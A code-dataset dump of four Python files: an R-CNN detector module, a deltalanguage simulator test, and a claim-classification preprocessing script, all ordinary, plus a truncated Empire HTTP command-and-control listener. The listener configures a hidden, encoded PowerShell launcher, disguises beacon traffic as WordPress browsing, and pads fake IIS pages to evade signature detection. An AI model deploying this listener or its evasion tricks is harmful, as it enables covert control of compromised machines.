openpose/model/detector/generalized_rcnn.py
leehsiu/pyopenpose
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
[ "MIT" ]
null
null
null
openpose/model/detector/generalized_rcnn.py
leehsiu/pyopenpose
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
[ "MIT" ]
null
null
null
openpose/model/detector/generalized_rcnn.py
leehsiu/pyopenpose
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
[ "MIT" ]
null
null
null
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. """ Implements the Generalized R-CNN framework """ import torch from torch import nn from openpose.structures.image_list import to_image_list from ..backbone import build_backbone from ..rpn.rpn import build_rpn from ..roi_heads.roi_heads import build_roi_heads class GeneralizedRCNN(nn.Module): """ Main class for Generalized R-CNN. Currently supports boxes and masks. It consists of three main parts: - backbone - rpn - heads: takes the features + the proposals from the RPN and computes detections / masks from it. """ def __init__(self, cfg): super(GeneralizedRCNN, self).__init__() self.backbone = build_backbone(cfg) self.rpn = build_rpn(cfg, self.backbone.out_channels) self.roi_heads = build_roi_heads(cfg, self.backbone.out_channels) def forward(self, images, targets=None): """ Arguments: images (list[Tensor] or ImageList): images to be processed targets (list[BoxList]): ground-truth boxes present in the image (optional) Returns: result (list[BoxList] or dict[Tensor]): the output from the model. During training, it returns a dict[Tensor] which contains the losses. During testing, it returns list[BoxList] contains additional fields like `scores`, `labels` and `mask` (for Mask R-CNN models). """ if self.training and targets is None: raise ValueError("In training mode, targets should be passed") images = to_image_list(images) features = self.backbone(images.tensors) proposals, proposal_losses = self.rpn(images, features, targets) if self.roi_heads: x, result, detector_losses = self.roi_heads(features, proposals, targets) else: # RPN-only models don't have roi_heads x = features result = proposals detector_losses = {} if self.training: losses = {} losses.update(detector_losses) losses.update(proposal_losses) return losses,result return result
34.384615
87
0.644295
import torch from torch import nn from openpose.structures.image_list import to_image_list from ..backbone import build_backbone from ..rpn.rpn import build_rpn from ..roi_heads.roi_heads import build_roi_heads class GeneralizedRCNN(nn.Module): def __init__(self, cfg): super(GeneralizedRCNN, self).__init__() self.backbone = build_backbone(cfg) self.rpn = build_rpn(cfg, self.backbone.out_channels) self.roi_heads = build_roi_heads(cfg, self.backbone.out_channels) def forward(self, images, targets=None): if self.training and targets is None: raise ValueError("In training mode, targets should be passed") images = to_image_list(images) features = self.backbone(images.tensors) proposals, proposal_losses = self.rpn(images, features, targets) if self.roi_heads: x, result, detector_losses = self.roi_heads(features, proposals, targets) else: x = features result = proposals detector_losses = {} if self.training: losses = {} losses.update(detector_losses) losses.update(proposal_losses) return losses,result return result
true
true
f705cb12d2f7098d80c81f26b124cf8f7a03cf9a
1,441
py
Python
deltalanguage/test/runtime/test_runtime.py
riverlane/deltalanguage
41c3cfa88ed3f17956645c18566c2147a4bdd74c
[ "MIT" ]
16
2021-01-06T17:44:51.000Z
2022-01-06T12:07:07.000Z
deltalanguage/test/runtime/test_runtime.py
riverlane/deltalanguage
41c3cfa88ed3f17956645c18566c2147a4bdd74c
[ "MIT" ]
null
null
null
deltalanguage/test/runtime/test_runtime.py
riverlane/deltalanguage
41c3cfa88ed3f17956645c18566c2147a4bdd74c
[ "MIT" ]
4
2021-03-25T20:35:08.000Z
2021-09-06T13:10:58.000Z
"""Test DeltaPySimulator functionality pre-execution.""" import unittest import deltalanguage as dl from deltalanguage.test._graph_lib import (getg_const_chain, getg_optional_queues) class DeltaQueueCreationTest(unittest.TestCase): """Test that the simulator creates queues properly.""" def test_queue_types(self): """Test that queues of correct types are created (or not) depending on the type of the source and destination nodes. """ graph = getg_const_chain() dl.DeltaPySimulator(graph) self.assertEqual(len(graph.nodes[0].out_queues), 0) self.assertEqual(len(graph.nodes[1].out_queues), 1) self.assertEqual(len(graph.nodes[2].out_queues), 1) self.assertEqual(type(graph.nodes[1].out_queues['output']), dl.runtime.ConstQueue) self.assertEqual(type(graph.nodes[2].out_queues['output']), dl.runtime.DeltaQueue) def test_queue_optionality(self): """Test that queues inhere correct optionality depending on the type of the destination node. """ graph = getg_optional_queues() dl.DeltaPySimulator(graph) self.assertEqual(graph.nodes[0].out_queues['output'].optional, True) self.assertEqual(graph.nodes[1].out_queues['output'].optional, False) if __name__ == "__main__": unittest.main()
33.511628
79
0.651631
import unittest import deltalanguage as dl from deltalanguage.test._graph_lib import (getg_const_chain, getg_optional_queues) class DeltaQueueCreationTest(unittest.TestCase): def test_queue_types(self): graph = getg_const_chain() dl.DeltaPySimulator(graph) self.assertEqual(len(graph.nodes[0].out_queues), 0) self.assertEqual(len(graph.nodes[1].out_queues), 1) self.assertEqual(len(graph.nodes[2].out_queues), 1) self.assertEqual(type(graph.nodes[1].out_queues['output']), dl.runtime.ConstQueue) self.assertEqual(type(graph.nodes[2].out_queues['output']), dl.runtime.DeltaQueue) def test_queue_optionality(self): graph = getg_optional_queues() dl.DeltaPySimulator(graph) self.assertEqual(graph.nodes[0].out_queues['output'].optional, True) self.assertEqual(graph.nodes[1].out_queues['output'].optional, False) if __name__ == "__main__": unittest.main()
true
true
f705cc3c3ee5b9fb1d0983e8eed642f662f1aec3
11,417
py
Python
cnn_claim_classification/preprocess_data_verify.py
UKPLab/coling2016-claim-classification-
e8ef5305a772b18efcaae2d18aa138b4f7a0e294
[ "BSD-3-Clause" ]
9
2016-12-19T17:16:34.000Z
2020-11-02T12:32:14.000Z
cnn_claim_classification/preprocess_data_verify.py
UKPLab/coling2016-claim-classification-
e8ef5305a772b18efcaae2d18aa138b4f7a0e294
[ "BSD-3-Clause" ]
1
2018-07-04T11:07:31.000Z
2018-07-04T11:07:31.000Z
cnn_claim_classification/preprocess_data_verify.py
UKPLab/coling2016-claim-classification-
e8ef5305a772b18efcaae2d18aa138b4f7a0e294
[ "BSD-3-Clause" ]
3
2017-04-26T16:49:25.000Z
2020-02-26T12:31:05.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Program to preprocess training and test data using word2vec, dep2vec and fact2vec embeddings and prepare corresponding weight vectors to be used in CNN Copyright (C) 2016 Ubiquitous Knowledge Processing (UKP) Lab Technische Universität Darmstadt Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import numpy as np import cPickle from collections import defaultdict import sys, re import pandas as pd def preprocess_data(corpus): """ Process the training and test data usable for training """ claims = [] #trainset exp_file = corpus[0] nonexp_file = corpus[1] unv_file = corpus[2] #test set exp_file1 = corpus[3] nonexp_file1 = corpus[4] unv_file1 = corpus[5] vocab = defaultdict(float) with open(exp_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) #print rev words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":1, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(nonexp_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":0, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(unv_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":2, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(exp_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":1, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) with open(nonexp_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":0, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) with open(unv_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":2, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) return claims, vocab def get_W(word_vecs, k=300): """ Get word matrix. W[i] is the vector for word indexed by i """ vocab_size = len(word_vecs) word_idx_map = dict() W = np.zeros(shape=(vocab_size+1, k)) W[0] = np.zeros(k) i = 1 for word in word_vecs: W[i] = word_vecs[word] word_idx_map[word] = i i += 1 return W, word_idx_map def load_bin_vec(fname, vocab): """ Loads 300x1 word vecs from Google (Mikolov) word2vec """ word_vecs = {} with open(fname, "rb") as f: header = f.readline() vocab_size, layer1_size = map(int, header.split()) binary_len = np.dtype('float32').itemsize * layer1_size for line in xrange(vocab_size): word = [] while True: ch = f.read(1) if ch == ' ': word = ''.join(word) break if ch != '\n': word.append(ch) if word in vocab: wvector = np.fromstring(f.read(binary_len), dtype='float32') word_vecs[word] = wvector[0:300] #print "wordvec", word_vecs[word] else: f.read(binary_len) return word_vecs def load_levy_vec(fname, vocab, k): #deps.words is a dependency word embeddings from Omer levy work word_vecs = {} with open(fname, "rb") as f: for line in f: wordvector = line.strip().split(' ') word = wordvector[0] #print ('word vector',word,wordvector) del wordvector[0] if word in vocab: vec = np.array(wordvector, dtype='float32') word_vecs[word]=vec[0:k] return word_vecs def add_unknown_words(word_vecs, vocab, min_df=1, k=300): """ For words that occur in at least min_df documents, create a separate word vector. 0.25 is chosen so the unknown vectors have (approximately) same variance as pre-trained ones """ for word in vocab: if word not in word_vecs and vocab[word] >= min_df: word_vecs[word] = np.random.uniform(-0.25,0.25,k) def clean_str(string): """ Tokenization/string cleaning for dataset """ string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string) string = re.sub(r"\'s", " \'s", string) string = re.sub(r"\'ve", " \'ve", string) string = re.sub(r"n\'t", " n\'t", string) string = re.sub(r"\'re", " \'re", string) string = re.sub(r"\'d", " \'d", string) string = re.sub(r"\'ll", " \'ll", string) string = re.sub(r",", " , ", string) string = re.sub(r"!", " ! ", string) string = re.sub(r"\(", " \( ", string) string = re.sub(r"\)", " \) ", string) string = re.sub(r"\?", " \? ", string) string = re.sub(r"\s{2,}", " ", string) return string.strip().lower() if __name__=="__main__": w2v_file = sys.argv[1] d2v_file = sys.argv[2] f2v_file = sys.argv[3] data_folder = ["../data/data_verifiable_unverifiable/train_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_data/verify_unv/unverify.txt","../data/data_verifiable_unverifiable/test_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/test_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/test_data/verify_unv/unverify.txt"] #train and dev splits #data_folder = ["../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_unv/unverify.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_unv/unverify.txt"] print "loading data..." claims, vocab = preprocess_data(data_folder) max_l = np.max(pd.DataFrame(claims)["num_words"]) print "data loaded!" print "number of sentences: " + str(len(claims)) print "vocab size: " + str(len(vocab)) print "max sentence length: " + str(max_l) #loading word2vec embeddings print "loading word2vec vectors...", w2v = load_bin_vec(w2v_file, vocab) print "word2vec loaded!" print "num words already in word2vec: " + str(len(w2v)) #load omerlevy word embeddings print "loading dependency word2vec vectors...", d2v = load_levy_vec(d2v_file, vocab, 300) print "dep2vec loaded!" print "num words already in dep2vec: " + str(len(d2v)) #loading factual embeddings print "loading fact2vec vectors...", f2v = load_bin_vec(f2v_file, vocab) print "fact2vec loaded!" print "num words already in fact2vec: " + str(len(f2v)) #Add distributions for unseen words in w2v add_unknown_words(w2v, vocab) # get weight vector using w2v W_w2v, word_idx_map_w2v = get_W(w2v) #Add distributions for unseen words in d2v add_unknown_words(d2v, vocab) # get weight vector using d2v W_d2v, word_idx_map_d2v = get_W(d2v) #Add distributions for unseen words in f2v add_unknown_words(f2v, vocab) # get weight vector using f2v W_f2v, word_idx_map_f2v = get_W(f2v) #random vectors and weights rand_vecs = {} add_unknown_words(rand_vecs, vocab) W2, _ = get_W(rand_vecs) # consider 100 dimensions from each embeddings to form 300 dimnesion stacked embedding vector k = 100 #concatenated embeddings - word2vec, de2vec, fact2vec embeddings cvecs = {} #concatenate all vectors into final vector for voc in w2v: if voc in d2v and voc in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:k],d2v[voc][0:k],f2v[voc][0:k]]) elif voc not in d2v and voc in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:2*k],f2v[voc][0:k]]) elif voc in d2v and voc not in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:2*k],d2v[voc][0:k]]) else: cvecs[voc] = w2v[voc] #Add distributions for unseen words in cvecs add_unknown_words(cvecs, vocab) # get weight vector using cvecs W_concat, word_idx_map_concat = get_W(cvecs) cPickle.dump([claims, W_w2v, W2, word_idx_map_w2v, vocab, max_l], open("claims_verify_word2vec.p", "wb")) cPickle.dump([claims, W_d2v, W2, word_idx_map_d2v, vocab, max_l], open("claims_verify_dep2vec.p", "wb")) cPickle.dump([claims, W_f2v, W2, word_idx_map_f2v, vocab, max_l], open("claims_verify_fact2vec.p", "wb")) cPickle.dump([claims, W_concat, W2, word_idx_map_concat, vocab, max_l], open("claims_verify_concat.p", "wb")) print ("word2vec, dep2vec, fact2vec, stacked pickle datasets are created!")
35.346749
568
0.581852
""" Program to preprocess training and test data using word2vec, dep2vec and fact2vec embeddings and prepare corresponding weight vectors to be used in CNN Copyright (C) 2016 Ubiquitous Knowledge Processing (UKP) Lab Technische Universität Darmstadt Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import numpy as np import cPickle from collections import defaultdict import sys, re import pandas as pd def preprocess_data(corpus): """ Process the training and test data usable for training """ claims = [] exp_file = corpus[0] nonexp_file = corpus[1] unv_file = corpus[2] exp_file1 = corpus[3] nonexp_file1 = corpus[4] unv_file1 = corpus[5] vocab = defaultdict(float) with open(exp_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":1, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(nonexp_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":0, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(unv_file, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":2, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "train" } claims.append(datum) with open(exp_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":1, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) with open(nonexp_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":0, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) with open(unv_file1, "rb") as f: for line in f: claim = [] claim.append(line.strip()) orig_claim = clean_str(" ".join(claim)) words = set(orig_claim.split()) for word in words: vocab[word] += 1 datum = {"y":2, "text": orig_claim, "num_words": len(orig_claim.split()), "split": "test" } claims.append(datum) return claims, vocab def get_W(word_vecs, k=300): """ Get word matrix. W[i] is the vector for word indexed by i """ vocab_size = len(word_vecs) word_idx_map = dict() W = np.zeros(shape=(vocab_size+1, k)) W[0] = np.zeros(k) i = 1 for word in word_vecs: W[i] = word_vecs[word] word_idx_map[word] = i i += 1 return W, word_idx_map def load_bin_vec(fname, vocab): """ Loads 300x1 word vecs from Google (Mikolov) word2vec """ word_vecs = {} with open(fname, "rb") as f: header = f.readline() vocab_size, layer1_size = map(int, header.split()) binary_len = np.dtype('float32').itemsize * layer1_size for line in xrange(vocab_size): word = [] while True: ch = f.read(1) if ch == ' ': word = ''.join(word) break if ch != '\n': word.append(ch) if word in vocab: wvector = np.fromstring(f.read(binary_len), dtype='float32') word_vecs[word] = wvector[0:300] else: f.read(binary_len) return word_vecs def load_levy_vec(fname, vocab, k): word_vecs = {} with open(fname, "rb") as f: for line in f: wordvector = line.strip().split(' ') word = wordvector[0] del wordvector[0] if word in vocab: vec = np.array(wordvector, dtype='float32') word_vecs[word]=vec[0:k] return word_vecs def add_unknown_words(word_vecs, vocab, min_df=1, k=300): """ For words that occur in at least min_df documents, create a separate word vector. 0.25 is chosen so the unknown vectors have (approximately) same variance as pre-trained ones """ for word in vocab: if word not in word_vecs and vocab[word] >= min_df: word_vecs[word] = np.random.uniform(-0.25,0.25,k) def clean_str(string): """ Tokenization/string cleaning for dataset """ string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string) string = re.sub(r"\'s", " \'s", string) string = re.sub(r"\'ve", " \'ve", string) string = re.sub(r"n\'t", " n\'t", string) string = re.sub(r"\'re", " \'re", string) string = re.sub(r"\'d", " \'d", string) string = re.sub(r"\'ll", " \'ll", string) string = re.sub(r",", " , ", string) string = re.sub(r"!", " ! ", string) string = re.sub(r"\(", " \( ", string) string = re.sub(r"\)", " \) ", string) string = re.sub(r"\?", " \? ", string) string = re.sub(r"\s{2,}", " ", string) return string.strip().lower() if __name__=="__main__": w2v_file = sys.argv[1] d2v_file = sys.argv[2] f2v_file = sys.argv[3] data_folder = ["../data/data_verifiable_unverifiable/train_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_data/verify_unv/unverify.txt","../data/data_verifiable_unverifiable/test_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/test_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/test_data/verify_unv/unverify.txt"] #train and dev splits #data_folder = ["../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_dev_data/train_data/verify_unv/unverify.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_exp/verify_exp.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_nonexp/verify_nonexp.txt","../data/data_verifiable_unverifiable/train_dev_data/dev_data/verify_unv/unverify.txt"] print "loading data..." claims, vocab = preprocess_data(data_folder) max_l = np.max(pd.DataFrame(claims)["num_words"]) print "data loaded!" print "number of sentences: " + str(len(claims)) print "vocab size: " + str(len(vocab)) print "max sentence length: " + str(max_l) #loading word2vec embeddings print "loading word2vec vectors...", w2v = load_bin_vec(w2v_file, vocab) print "word2vec loaded!" print "num words already in word2vec: " + str(len(w2v)) #load omerlevy word embeddings print "loading dependency word2vec vectors...", d2v = load_levy_vec(d2v_file, vocab, 300) print "dep2vec loaded!" print "num words already in dep2vec: " + str(len(d2v)) #loading factual embeddings print "loading fact2vec vectors...", f2v = load_bin_vec(f2v_file, vocab) print "fact2vec loaded!" print "num words already in fact2vec: " + str(len(f2v)) #Add distributions for unseen words in w2v add_unknown_words(w2v, vocab) # get weight vector using w2v W_w2v, word_idx_map_w2v = get_W(w2v) #Add distributions for unseen words in d2v add_unknown_words(d2v, vocab) # get weight vector using d2v W_d2v, word_idx_map_d2v = get_W(d2v) #Add distributions for unseen words in f2v add_unknown_words(f2v, vocab) # get weight vector using f2v W_f2v, word_idx_map_f2v = get_W(f2v) #random vectors and weights rand_vecs = {} add_unknown_words(rand_vecs, vocab) W2, _ = get_W(rand_vecs) # consider 100 dimensions from each embeddings to form 300 dimnesion stacked embedding vector k = 100 #concatenated embeddings - word2vec, de2vec, fact2vec embeddings cvecs = {} #concatenate all vectors into final vector for voc in w2v: if voc in d2v and voc in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:k],d2v[voc][0:k],f2v[voc][0:k]]) elif voc not in d2v and voc in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:2*k],f2v[voc][0:k]]) elif voc in d2v and voc not in f2v: cvecs[voc] = np.concatenate([w2v[voc][0:2*k],d2v[voc][0:k]]) else: cvecs[voc] = w2v[voc] #Add distributions for unseen words in cvecs add_unknown_words(cvecs, vocab) # get weight vector using cvecs W_concat, word_idx_map_concat = get_W(cvecs) cPickle.dump([claims, W_w2v, W2, word_idx_map_w2v, vocab, max_l], open("claims_verify_word2vec.p", "wb")) cPickle.dump([claims, W_d2v, W2, word_idx_map_d2v, vocab, max_l], open("claims_verify_dep2vec.p", "wb")) cPickle.dump([claims, W_f2v, W2, word_idx_map_f2v, vocab, max_l], open("claims_verify_fact2vec.p", "wb")) cPickle.dump([claims, W_concat, W2, word_idx_map_concat, vocab, max_l], open("claims_verify_concat.p", "wb")) print ("word2vec, dep2vec, fact2vec, stacked pickle datasets are created!")
false
true
f705cca2c11cb0eec1833939de1b8673fc58b816
62,891
py
Python
lib/listeners/http.py
bit-St0rm/Empire
0d3295be5b4ab01703d330d2c748a1b9f0a28695
[ "BSD-3-Clause" ]
null
null
null
lib/listeners/http.py
bit-St0rm/Empire
0d3295be5b4ab01703d330d2c748a1b9f0a28695
[ "BSD-3-Clause" ]
null
null
null
lib/listeners/http.py
bit-St0rm/Empire
0d3295be5b4ab01703d330d2c748a1b9f0a28695
[ "BSD-3-Clause" ]
null
null
null
import logging import base64 import sys import random import string import os import ssl import time import copy import json import sys from pydispatch import dispatcher from flask import Flask, request, make_response, send_from_directory # Empire imports from lib.common import helpers from lib.common import agents from lib.common import encryption from lib.common import packets from lib.common import messages from lib.common import templating from lib.common import obfuscation class Listener: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'HTTP[S]', 'Author': ['@harmj0y'], 'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'), 'Category' : ('client_server'), 'Comments': [] } # any options needed by the stager, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Name' : { 'Description' : 'Name for the listener.', 'Required' : True, 'Value' : 'http' }, 'Host' : { 'Description' : 'Hostname/IP for staging.', 'Required' : True, 'Value' : "http://%s" % (helpers.lhost()) }, 'BindIP' : { 'Description' : 'The IP to bind to on the control server.', 'Required' : True, 'Value' : '0.0.0.0' }, 'Port' : { 'Description' : 'Port for the listener.', 'Required' : True, 'Value' : '' }, 'Launcher' : { 'Description' : 'Launcher string.', 'Required' : True, 'Value' : 'POWerShell.EXe -wIndO 1 -stA -noPrO -enc ' }, 'StagingKey' : { 'Description' : 'Staging key for initial agent negotiation.', 'Required' : True, 'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa' }, 'DefaultDelay' : { 'Description' : 'Agent delay/reach back interval (in seconds).', 'Required' : True, 'Value' : 5 }, 'DefaultJitter' : { 'Description' : 'Jitter in agent reachback interval (0.0-1.0).', 'Required' : True, 'Value' : 0.0 }, 'DefaultLostLimit' : { 'Description' : 'Number of missed checkins before exiting', 'Required' : True, 'Value' : 60 }, 'DefaultProfile' : { 'Description' : 'Default communication profile for the agent.', 'Required' : True, 'Value' : "/blog/,/wp-admin/login/,/brewery/,/shop?q=2341fdsar3qqa,/wp-content/plugins/square-sync/square-sync.css?ver=0.1,/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css?ver=3.5.3|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763|Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8|Accept-Language:en-US,en;q=0.5|Accept-Encoding:gzip, deflate" }, 'CertPath' : { 'Description' : 'Certificate path for https listeners.', 'Required' : False, 'Value' : '' }, 'KillDate' : { 'Description' : 'Date for the listener to exit (MM/dd/yyyy).', 'Required' : False, 'Value' : '' }, 'WorkingHours' : { 'Description' : 'Hours for the agent to operate (09:00-17:00).', 'Required' : False, 'Value' : '' }, 'Headers' : { 'Description' : 'Headers for the control server.', 'Required' : True, 'Value' : 'Server:Microsoft-IIS/10' }, 'Cookie' : { 'Description' : 'Custom Cookie Name', 'Required' : False, 'Value' : '' }, 'StagerURI' : { 'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php', 'Required' : False, 'Value' : '/download/wp-content/uploads/brewery.svg' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'Proxy' : { 'Description' : 'Proxy to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'ProxyCreds' : { 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'SlackToken' : { 'Description' : 'Your SlackBot API token to communicate with your Slack instance.', 'Required' : False, 'Value' : '' }, 'SlackChannel' : { 'Description' : 'The Slack channel or DM that notifications will be sent to.', 'Required' : False, 'Value' : '#general' } } # required: self.mainMenu = mainMenu self.threads = {} # optional/specific for this module self.app = None self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] # set the default staging key to the controller db default self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0]) # randomize the length of the default_response and index_page headers to evade signature based scans self.header_offset = random.randint(0, 64) self.session_cookie = '' # check if the current session cookie not empty and then generate random cookie if self.session_cookie == '': self.options['Cookie']['Value'] = self.generate_cookie() def default_response(self): """ Returns an IIS 7.5 404 not found page. """ return '\n'.join([ '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">', '<html xmlns="http://www.w3.org/1999/xhtml">', '<head>', '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>', '<title>404 - File or directory not found.</title>', '<style type="text/css">', '<!--', 'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}', 'fieldset{padding:0 15px 10px 15px;}', 'h1{font-size:2.4em;margin:0;color:#FFF;}', 'h2{font-size:1.7em;margin:0;color:#CC0000;}', 'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}', '#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;', 'background-color:#555555;}', '#content{margin:0 0 0 2%;position:relative;}', '.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}', '-->', '</style>', '</head>', '<body>', '<div id="header"><h1>Server Error</h1></div>', '<div id="content">', ' <div class="content-container"><fieldset>', ' <h2>404 - File or directory not found.</h2>', ' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>', ' </fieldset></div>', '</div>', '</body>', '</html>', ' ' * self.header_offset, # randomize the length of the header to evade signature based detection ]) def index_page(self): """ Returns a default HTTP server page. """ return '\n'.join([ '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">', '<html xmlns="http://www.w3.org/1999/xhtml">', '<head>', '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />', '<title>IIS7</title>', '<style type="text/css">', '<!--', 'body {', ' color:#000000;', ' background-color:#B3B3B3;', ' margin:0;', '}', '', '#container {', ' margin-left:auto;', ' margin-right:auto;', ' text-align:center;', ' }', '', 'a img {', ' border:none;', '}', '', '-->', '</style>', '</head>', '<body>', '<div id="container">', '<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>', '</div>', '</body>', '</html>', ]) def validate_options(self): """ Validate all options for this listener. """ self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] for key in self.options: if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''): print helpers.color("[!] Option \"%s\" is required." % (key)) return False # If we've selected an HTTPS listener without specifying CertPath, let us know. if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '': print helpers.color("[!] HTTPS selected but no CertPath specified.") return False return True def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None): """ Generate a basic launcher for the specified listener. """ if not language: print helpers.color('[!] listeners/http generate_launcher(): no language specified!') if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners): # extract the set options for this instantiated listener listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options'] host = listenerOptions['Host']['Value'] launcher = listenerOptions['Launcher']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] profile = 